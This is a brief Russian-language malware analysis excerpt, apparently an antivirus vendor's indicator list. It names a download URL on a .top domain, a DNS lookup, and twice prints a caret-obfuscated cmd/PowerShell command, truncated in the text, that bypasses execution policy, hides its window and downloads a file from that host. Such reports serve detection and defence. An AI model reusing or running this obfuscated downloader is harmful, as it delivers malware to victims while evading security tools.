Техническая информация
- http://www.zoerpoled.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pow^e^rSHeLL.EXE -EXE^c^U^TioN^Po^l^I^c^Y by^Pa^SS^ -n^oPRof^I^LE -^WI^nD^Ows^tyle H^idden ^(^NEw-O^BJe^c^T ^SyS^te^M.NEt.W^EBcl^IEnt^).^do^w^n^L^o^a^DFil^e('http://www.z...
- DNS ASK zo###oled.top
- '<SYSTEM32>\cmd.exe' /C "pow^e^rSHeLL.EXE -EXE^c^U^TioN^Po^l^I^c^Y by^Pa^SS^ -n^oPRof^I^LE -^WI^nD^Ows^tyle H^idden ^(^NEw-O^BJe^c^T ^SyS^te^M.NEt.W^EBcl^IEnt^).^do^w^n^L^o^a^DFil^e('http://www.z...' (со скрытым окном)